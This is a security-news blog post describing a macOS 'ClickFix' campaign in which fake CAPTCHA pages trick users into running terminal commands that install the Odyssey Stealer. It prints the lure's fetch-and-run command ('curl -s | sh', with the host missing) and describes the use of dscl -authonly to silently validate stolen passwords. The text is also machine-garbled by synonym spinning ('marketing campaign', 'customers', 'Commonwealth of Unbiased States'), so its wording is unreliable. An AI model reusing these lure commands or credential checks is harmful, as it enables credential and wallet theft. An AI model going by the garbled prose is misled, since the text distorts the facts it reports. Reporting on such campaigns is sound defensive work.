Skip to content
  • Blog Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form

Threat Actors Employ Clickfix Tactics to Deliver Malicious AppleScripts That Steal Login Credentials

Posted on June 27, 2025June 27, 2025 By CWS

A classy new malware marketing campaign focusing on macOS customers has emerged, using misleading “Clickfix” ways to distribute malicious AppleScripts designed to reap delicate consumer credentials and monetary information.

The marketing campaign leverages typosquatted domains that intently mimic authentic finance platforms and Apple App Retailer web sites, making a convincing facade that tips customers into executing harmful instructions on their programs.

The assault begins when customers inadvertently go to malicious domains that current faux Cloudflare-style CAPTCHA prompts.

These seemingly authentic verification pages instruct macOS customers to repeat and paste Base64-encoded instructions into their terminal functions to show they don’t seem to be robots.

As soon as executed, these instructions provoke a complete information theft operation that targets browser credentials, cryptocurrency wallets, and delicate private data saved throughout a number of functions.

Cyfirma researchers recognized this malware because the Odyssey Stealer, a rebranded model of the beforehand identified Poseidon Stealer that itself originated as a fork of the AMOS Stealer.

The analysis crew uncovered a number of command-and-control panels linked to this exercise, with infrastructure primarily hosted in Russia.

The malware demonstrates a transparent choice for focusing on customers in Western nations, notably the USA and European Union, whereas conspicuously avoiding victims in Commonwealth of Unbiased States nations.

The Odyssey Stealer represents a regarding evolution in macOS-targeting malware, combining social engineering ways with subtle technical capabilities.

Not like conventional malware that depends on software program vulnerabilities, this marketing campaign exploits human psychology by presenting customers with familiar-looking safety prompts that seem like routine verification procedures.

The attackers have rigorously crafted their distribution web sites to reflect trusted platforms, making detection notably difficult for unsuspecting customers.

An infection Mechanism and Payload Execution

The malware’s an infection mechanism depends on a multi-stage course of that begins with area typosquatting and culminates in complete system compromise.

ClickFix distribution move (Supply – Cyfirma)

When customers go to the malicious domains, they encounter professionally designed pages that replicate the looks of authentic CAPTCHA verification programs.

The faux immediate shows directions for macOS customers to execute a command that seems as follows:-

curl -s | sh

This command retrieves and executes an AppleScript from the attacker’s command-and-control server. The script employs alphanumeric obfuscation to cover perform names, although evaluation reveals its true goal.

Upon execution, the malware creates a short lived listing construction utilizing the mkdir command, particularly establishing /tmp/lovemrtrump as its operational base.

The AppleScript then shows a convincing authentication immediate designed to seize the consumer’s system password.

To validate stolen credentials silently, it leverages the macOS dscl command with the authonly parameter, guaranteeing the verification course of stays hidden from the consumer.

This method permits the malware to verify password validity with out triggering system alerts or consumer suspicion, demonstrating the attackers’ deep understanding of macOS safety mechanisms.

Examine reside malware conduct, hint each step of an assault, and make quicker, smarter safety choices -> Attempt ANY.RUN now

Cyber Security News Tags:Actors, AppleScripts, ClickFix, Credentials, Deliver, Employ, Login, Malicious, Steal, Tactics, Threat

Post navigation

Previous Post: RevEng.ai Raises $4.15 Million to Secure Software Supply Chain
Next Post: Chinese Group Silver Fox Uses Fake Websites to Deliver Sainbox RAT and Hidden Rootkit

Related Posts

DeepSeek-R1 Makes Code for Prompts With Severe Security Vulnerabilities Cyber Security News
Google’s Gemini Deep Research Tool Gains Access to Gmail, Chat, and Drive Data Cyber Security News
Multiple Splunk Enterprise Vulnerabilities Let Attackers Execute Unauthorized JavaScript code Cyber Security News
Great Firewall of China’s Sensitive Data of Over 500GB+ Leaked Online Cyber Security News
Weaponized ScreenConnect RMM Tool Tricks Users into Downloading Xworm RAT Cyber Security News
Hackers Weaponize AWS X-Ray Service to Work as Covert Command & Control Server Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • Hackers Leveraging WhatsApp That Silently Harvest Logs and Contact Details
  • Elite Cyber Veterans Launch Blast Security with $10M to Turn Cloud Detection into Prevention
  • PoC released for W3 Total Cache Vulnerability that Exposes 1+ Million Websites to RCE Attacks
  • CISA Confirms Exploitation of Recent Oracle Identity Manager Vulnerability
  • 800+ npm Packages and Thousands of GitHub Repos Compromised

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • November 2025
  • October 2025
  • September 2025
  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • Hackers Leveraging WhatsApp That Silently Harvest Logs and Contact Details
  • Elite Cyber Veterans Launch Blast Security with $10M to Turn Cloud Detection into Prevention
  • PoC released for W3 Total Cache Vulnerability that Exposes 1+ Million Websites to RCE Attacks
  • CISA Confirms Exploitation of Recent Oracle Identity Manager Vulnerability
  • 800+ npm Packages and Thousands of GitHub Repos Compromised

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Copyright © 2025 Cyber Web Spider Blog – News.

Powered by PressBook Masonry Dark